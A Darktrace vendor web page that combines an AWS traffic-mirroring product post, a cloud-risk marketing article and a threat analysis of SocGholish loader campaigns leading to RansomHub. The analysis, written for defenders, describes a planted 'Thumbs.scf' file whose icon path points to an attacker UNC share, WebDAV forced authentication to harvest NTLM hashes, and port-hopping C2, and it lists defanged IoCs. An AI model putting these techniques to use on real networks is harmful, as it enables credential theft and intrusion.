Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Andrew Tsonchev
VP, Security & AI Strategy, Field CISO
Share
09
Mar 2021
Darktrace's Cyber AI brings real-time visibility and adaptive, autonomous defense to your AWS cloud security strategy.
The platform continuously learns what normal behavior looks like for every user, device, and workload in your AWS environment. With this deep understanding of usual ‘patterns of life,’ Darktrace can recognize the subtle deviations that point to a threat, from account takeovers to critical misconfigurations.
This bespoke, real-time knowledge of usual activity allows Darktrace to spot the unknown and unpredictable threats that get through policy-based defenses – all without relying on any rules, signatures, or prior assumptions.
With Amazon Virtual Private Cloud (Amazon VPC) Traffic Mirroring, Darktrace’s self-learning AI can seamlessly access granular packet data in AWS cloud environments, helping the platform build a rich understanding of context. AWS’s recent announcement of the extension of VPC Traffic Mirroring to non-Nitro instance types now allows our customers to gain agentless Cyber AI defense across these instances as well.
Expanding VPC traffic mirroring to non-Nitro instances
Amazon VPC Traffic Mirroring replicates the network traffic from EC2 instances within VPCs and allows customers to leverage this traffic for Darktrace’s AI-driven threat detection and investigation. Darktrace’s Cyber AI learns ‘on the job’ what normal activity looks like in customer AWS environments, in part using the real-time visibility provided by VPC Traffic Mirroring. The platform continuously adapts as each customer’s business evolves, a critical feature given the speed and scale of development in the cloud.
Previously, customers could only enable VPC Traffic Mirroring on their Nitro-based EC2 instances. Now, AWS has announced that this seamless access to hundreds of features from network traffic is extended to select non-Nitro instance types, supporting Darktrace’s ability to easily learn the bespoke behavioral patterns of our customers’ Amazon VPCs.
Customers can now enable VPC Traffic Mirroring on additional instances types such as C4, D2, G3, G3s, H1, I3, M4, P2, P3, R4, X1 and X1e that use the Xen-based hypervisor.* This feature is available in all 20 regions where VPC Traffic Mirroring is currently supported.
VPC Traffic Mirroring supports many of Darktrace’s extensive use cases across AWS, which include:
Data exfiltration and destruction: Detects anomalous device connections and user access, as well as unusual resource deletion, modification, and movement;
Critical misconfigurations: Catches open S3 buckets, anomalous permission changes, and unusual activity around compliance-related data and devices;
Compromised credentials: Spots unusual logins, including brute force attempts and unusual login source/time, as well as unusual user behavior, from rule changes to password resets;
Insider threat and admin abuse: Identifies the subtle signs of malicious insiders – including sensitive file access, resource modification, role changes, and adding/deleting users.
Figure 1: Darktrace illuminates activity in AWS
Autonomous investigation and response for AWS cloud environments
The Darktrace Security Module for AWS provides additional visibility across AWS environments via interaction with AWS CloudTrail, allowing for AI-powered monitoring of management and administration activity. With this deep knowledge of how your business operates in the cloud, Darktrace delivers total coverage across all your AWS services, including:
EC2
IAM
S3
VPC
Lambda
Athena
DynamoDB
Route 53
ACM
RDS
The recently announced Version 5 of the Darktrace, which focuses on protecting the cloud and the remote workforce, further augments Darktrace’s coverage of AWS environments. Among many other exciting new features, Version 5 extends the reach of Cyber AI Analyst and Darktrace RESPOND to cloud environments like AWS VPCs.
Cyber AI Analyst augments the work of security teams by autonomously reporting on the full scope of security incidents and reduces triage time by up to 92%. Cyber AI Analyst can now also conduct on-demand investigations into users and devices of interest, ingest third-party alerts to trigger new investigations, and automatically feed AI-generated Incident Reports to any SIEM, SOAR, or downstream ticketing system.
Meanwhile, Darktrace RESPOND brings Autonomous Response to the critical infrastructure which AWS VPCs provide. Darktrace's responses are surgically precise and intelligently maintain normal business operations while stopping emerging threats in real time.**
“Darktrace's innovations are outstanding and have really meshed with our current needs as a security team, from the flexibility of our new cloud-delivered deployment to the extended visibility of the Darktrace Client Sensors.”
– CISO, Real Estate
We have also launched a dedicated user interface for visualization and intuitive analysis of cloud-based threats identified across AWS via the Darktrace Security Module.
Self-Learning AI defense across the enterprise
Darktrace offers AI-driven defense of cloud infrastructure in AWS, as well as across SaaS applications, email, corporate networks, industrial systems, and remote endpoints. Taking a fundamentally unique approach, Darktrace provides the industry’s only self-learning platform that gives complete coverage and visibility across the organization.
This is a critical benefit, as businesses and workforces today are increasingly complex and dynamic. Darktrace can connect the dots between unusual behavior in disparate infrastructure areas and ensure cloud security is not siloed from the monitoring of the rest of the organization.
Darktrace’s adaptive and unified approach allows the solution to detect, investigate, and respond to the full range of threats facing the enterprise – even those unpredictable threats that move across dynamic and diverse environments.
* VPC Traffic Mirroring is not supported on the T2, R3 and I2 instance types and previous generation instances. ** This product is only available in AWS for customers who leverage Darktrace osSensors.
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Combatting the Top Three Sources of Risk in the Cloud
With cloud computing, organizations are storing data like intellectual property, trade secrets, Personally Identifiable Information (PII), proprietary code and statistics, and other sensitive information in the cloud. If this data were to be accessed by malicious actors, it could incur financial loss, reputational damage, legal liabilities, and business disruption.
So, as cloud usage continues to grow, the teams in charge of protecting these deployments must understand the associated cybersecurity risks.
What are cloud risks?
Cloud threats come in many forms, with one of the key types consisting of cloud risks. These arise from challenges in implementing and maintaining cloud infrastructure, which can expose the organization to potential damage, loss, and attacks.
There are three major types of cloud risks:
1. Misconfigurations
As organizations struggle with complex cloud environments, misconfiguration is one of the leading causes of cloud security incidents. These risks occur when cloud settings leave gaps between cloud security solutions and expose data and services to unauthorized access. If discovered by a threat actor, a misconfiguration can be exploited to allow infiltration, lateral movement, escalation, and damage.
With the scale and dynamism of cloud infrastructure and the complexity of hybrid and multi-cloud deployments, security teams face a major challenge in exerting the required visibility and control to identify misconfigurations before they are exploited.
Common causes of misconfiguration come from skill shortages, outdated practices, and manual workflows. For example, potential misconfigurations can occur around firewall zones, isolated file systems, and mount systems, which all require specialized skill to set up and diligent monitoring to maintain
IAM has only increased in importance with the rise of cloud computing and remote working. It allows security teams to control which users can and cannot access sensitive data, applications, and other resources.
There are four parts to IAM: authentication, authorization, administration, and auditing and reporting. Within these, there are a lot of subcomponents as well, including but not limited to Single Sign-On (SSO), Two-Factor Authentication (2FA), Multi-Factor Authentication (MFA), and Role-Based Access Control (RBAC).
Security teams are faced with the challenge of allowing enough access for employees, contractors, vendors, and partners to complete their jobs while restricting enough to maintain security. They may struggle to track what users are doing across the cloud, apps, and on-premises servers.
When IAM is misconfigured, it increases the attack surface and can leave accounts with access to resources they do not need to perform their intended roles. This type of risk creates the possibility for threat actors or compromised accounts to gain access to sensitive company data and escalate privileges in cloud environments. It can also allow malicious insiders and users who accidentally violate data protection regulations to cause greater damage.
3. Cross-domain threats
The complexity of hybrid and cloud environments can be exploited by attacks that cross multiple domains, such as traditional network environments, identity systems, SaaS platforms, and cloud environments. These attacks are difficult to detect and mitigate, especially when a security posture is siloed or fragmented.
Some attack types inherently involve multiple domains, like lateral movement and supply chain attacks, which target both on-premises and cloud networks.
Challenges in securing against cross-domain threats often come from a lack of unified visibility. If a security team does not have unified visibility across the organization’s domains, gaps between various infrastructures and the teams that manage them can leave organizations vulnerable.
Adopting AI cybersecurity tools to reduce cloud risk
For security teams to defend against misconfigurations, IAM failures, and insecure APIs, they require a combination of enhanced visibility into cloud assets and architectures, better automation, and more advanced analytics. These capabilities can be achieved with AI-powered cybersecurity tools.
Such tools use AI and automation to help teams maintain a clear view of all their assets and activities and consistently enforce security policies.
Darktrace / CLOUD is a Cloud Detection and Response (CDR) solution that makes cloud security accessible to all security teams and SOCs by using AI to identify and correct misconfigurations and other cloud risks in public, hybrid, and multi-cloud environments.
It provides real-time, dynamic architectural modeling, which gives SecOps and DevOps teams a unified view of cloud infrastructures to enhance collaboration and reveal possible misconfigurations and other cloud risks. It continuously evaluates architecture changes and monitors real-time activity, providing audit-ready traceability and proactive risk management.
Figure 1: Real-time visibility into cloud assets and architectures built from network, configuration, and identity and access roles. In this unified view, Darktrace / CLOUD reveals possible misconfigurations and risk paths.
Darktrace / CLOUD also offers attack path modeling for the cloud. It can identify exposed assets and highlight internal attack paths to get a dynamic view of the riskiest paths across cloud environments, network environments, and between – enabling security teams to prioritize based on unique business risk and address gaps to prevent future attacks.
Darktrace’s Self-Learning AI ensures continuous cloud resilience, helping teams move from reactive to proactive defense.
Product Marketing Manager, OT Security & Compliance
Blog
/
/
May 2, 2025
SocGholish: From loader and C2 activity to RansomHub deployment
Over the past year, a clear pattern has emerged across the threat landscape: ransomware operations are increasingly relying on compartmentalized affiliate models. In these models, initial access brokers (IABs) [6], malware loaders, and post-exploitation operators work together.
Due to those specialization roles, a new generation of loader campaigns has risen. Threat actors increasingly employ loader operators to quietly establish footholds on the target network. These entities then hand off access to ransomware affiliates. One loader that continues to feature prominently in such campaigns is SocGholish.
What is SocGholish?
SocGholish is a loader malware that has been utilized since at least 2017 [7]. It has long been associated with fake browser updates and JavaScript-based delivery methods on infected websites.
Threat actors often target outdated or poorly secured CMS-based websites like WordPress. Through unpatched plugins, or even remote code execution flaws, they inject malicious JavaScript into the site’s HTML, templates or external JS resources [8]. Historically, SocGholish has functioned as a first-stage malware loader, ultimately leading to deployment of Cobalt Strike beacons [9], and further facilitating access persistence to corporate environments. More recently, multiple security vendors have reported that infections involving SocGholish frequently lead to the deployment of RansomHub ransomware [3] [5].
This blog explores multiple instances within Darktrace's customer base where SocGholish deployment led to subsequent network compromises. Investigations revealed indicators of compromise (IoCs) similar to those identified by external security researchers, along with variations in attacker behavior post-deployment. Key innovations in post-compromise activities include credential access tactics targeting authentication mechanisms, particularly through the abuse of legacy protocols like WebDAV and SCF file interactions over SMB.
Initial access and execution
Since January 2025, Darktrace’s Threat Research team observed multiple cases in which threat actors leveraged the SocGholish loader for initial access. Malicious actors commonly deliver SocGholish by compromising legitimate websites by injecting malicious scripts into the HTML of the affected site. When the visitor lands on an infected site, they are typically redirected to a fake browser update page, tricking them into downloading a ZIP file containing a JavaScript-based loader [1] [2]. In one case, a targeted user appears to have visited the compromised website garagebevents[.]com (IP: 35.203.175[.]30), from which around 10 MB of data was downloaded.
Figure 1: Device Event Log showing connections to the compromised website, following by connections to the identified Keitaro TDS instances.
Within milliseconds of the connection establishment, the user’s device initiated several HTTPS sessions over the destination port 443 to the external endpoint 176.53.147[.]97, linked to the following Keitaro TDS domains:
packedbrick[.]com
rednosehorse[.]com
blackshelter[.]org
blacksaltys[.]com
To evade detection, SocGholish uses highly obfuscated code and relies on traffic distribution systems (TDS) [3]. TDS is a tool used in digital and affiliate marketing to manage and distribute incoming web traffic based on predefined rules. More specifically, Keitaro is a premium self-hosted TDS frequently utilized by attackers as a payload repository for malicious scripts following redirects from compromised sites. In the previously noted example, it appears that the device connected to the compromised website, which then retrieved JavaScript code from the aforementioned Keitaro TDS domains. The script served by those instances led to connections to the endpoint virtual.urban-orthodontics[.]com (IP: 185.76.79[.]50), successfully completing SocGholish’s distribution.
Figure 2: Advanced Search showing connections to the compromised website, following by those to the identified Keitaro TDS instances.
Persistence
During some investigations, Darktrace researchers observed compromised devices initiating HTTPS connections to the endpoint files.pythonhosted[.]org (IP: 151.101.1[.]223), suggesting Python package downloads. External researchers have previously noted how attackers use Python-based backdoors to maintain access on compromised endpoints following initial access via SocGholish [5].
Credential access and lateral movement
Credential access – external
Darktrace researchers identified observed some variation in kill chain activities following initial access and foothold establishment. For example, Darktrace detected interesting variations in credential access techniques. In one such case, an affected device attempted to contact the rare external endpoint 161.35.56[.]33 using the Web Distributed Authoring and Versioning (WebDAV) protocol. WebDAV is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. WebDAV enables remote shares to be mounted over HTTP or HTTPS, similar to how SMB operates, but using web-based protocols. Windows supports WebDAV natively, which means a UNC path pointing to an HTTP or HTTPS resource can trigger system-level behavior such as authentication.
In this specific case, the system initiated outbound connections using the ‘Microsoft-WebDAV-MiniRedir/10.0.19045’ user-agent, targeting the URI path of /s on the external endpoint 161.35.56[.]33. During these requests, the host attempted to initiate NTML authentication and even SMB sessions over the web, both of which failed. Despite the session failures, these attempts also indicate a form of forced authentication. Forced authentication exploits a default behavior in Windows where, upon encountering a UNC path, the system will automatically try to authenticate to the resource using NTML – often without any user interaction. Although no files were directly retrieved, the WebDAV server was still likely able to retrieve the user’s NTLM hash during the session establishment requests, which can later be used by the adversary to crack the password offline.
Credential access – internal
In another investigated incident, Darktrace observed a related technique utilized for credential access and lateral movement. This time, the infected host uploaded a file named ‘Thumbs.scf’ to multiple internal SMB network shares. Shell Command File ( SCF) is a legacy Windows file format used primarily for Windows Explorer shortcuts. These files contain instructions for rendering icons or triggering shell commands, and they can be executed implicitly when a user simply opens a folder containing the file – no clicks required.
The ‘Thumbs.scf’ file dropped by the attacker was crafted to exploit this behavior. Its contents included a [Shell] section with the Command=2 directive and an IconFile path pointing to a remote UNC resource on the same external endpoint, 161.35.56[.]33, seen in the previously described case – specifically, ‘\\161.35.56[.]33\share\icon.ico’. When a user on the internal network navigates to the folder containing the SCF file, their system will automatically attempt to load the icon. In doing so, the system issues a request to the specified UNC path, which again prompts Windows to initiate NTML authentication.
This pattern of activity implies that the attacker leveraged passive internal exposure; users who simply browsed a compromised share would unknowingly send their NTML hashes to an external attacker-controlled host. Unlike the WebDAV approach, which required initiating outbound communication from the infected host, this SCF method relies on internal users to interact with poisoned folders.
Figure 3: Contents of the file 'Thumbs.scf' showing the UNC resource hosted on the external endpoint.
Command-and-control
Following initial compromise, affected devices would then attempt outbound connections using the TLS/SSL protocol over port 443 to different sets of command-and-control (C2) infrastructure associated with SocGholish. The malware frequently uses obfuscated JavaScript loaders to initiate its infection chain, and once dropped, the malware communicates back to its infrastructure over standard web protocols, typically using HTTPS over port 443. However, this set of connections would precede a second set of outbound connections, this time to infrastructure linked to RansomHub affiliates, possibly facilitating the deployed Python-based backdoor.
Connectivity to RansomHub infrastructure relied on defense evasion tactics, such as port-hopping. The idea behind port-hopping is to disguise C2 traffic by avoiding consistent patterns that might be caught by firewalls, and intrusion detection systems. By cycling through ephemeral ports, the malware increases its chances of slipping past basic egress filtering or network monitoring rules that only scrutinize common web traffic ports like 443 or 80. Darktrace analysts identified systems connecting to destination ports such as 2308, 2311, 2313 and more – all on the same destination IP address associated with the RansomHub C2 environment.
Figure 4: Advanced Search connection logs showing connections over destination ports that change rapidly.
Conclusion
Since the beginning of 2025, Darktrace analysts identified a campaign whereby ransomware affiliates leveraged SocGholish to establish network access in victim environments. This activity enabled multiple sets of different post exploitation activity. Credential access played a key role, with affiliates abusing WebDAV and NTML over SMB to trigger authentication attempts. The attackers were also able to plant SCF files internally to expose NTML hashes from users browsing shared folders. These techniques evidently point to deliberate efforts at early lateral movement and foothold expansion before deploying ransomware. As ransomware groups continue to refine their playbooks and work more closely with sophisticated loaders, it becomes critical to track not just who is involved, but how access is being established, expanded, and weaponized.
Credit to Chrisina Kreza (Cyber Analyst) and Adam Potter (Senior Cyber Analyst)
Appendices
Darktrace / NETWORK model alerts
· Anomalous Connection / SMB Enumeration
· Anomalous Connection / Multiple Connections to New External TCP Port
· Anomalous Connection / Multiple Failed Connections to Rare Endpoint
· Anomalous Connection / New User Agent to IP Without Hostname
· Compliance / External Windows Communication
· Compliance / SMB Drive Write
· Compromise / Large DNS Volume for Suspicious Domain
· Compromise / Large Number of Suspicious Failed Connections
· Device / Anonymous NTML Logins
· Device / External Network Scan
· Device / New or Uncommon SMB Named Pipe
· Device / SMB Lateral Movement
· Device / Suspicious SMB Activity
· Unusual Activity / Unusual External Activity
· User / Kerberos Username Brute Force
MITRE ATT&CK mapping
· Credential Access – T1187 Forced Authentication
· Credential Access – T1110 Brute Force
· Command and Control – T1071.001 Web Protocols
· Command and Control – T1571 Non-Standard Port
· Discovery – T1083 File and Directory Discovery
· Discovery – T1018 Remote System Discovery
· Discovery – T1046 Network Service Discovery
· Discovery – T1135 Network Share Discovery
· Execution – T1059.007 JavaScript
· Lateral Movement – T1021.002 SMB/Windows Admin Shares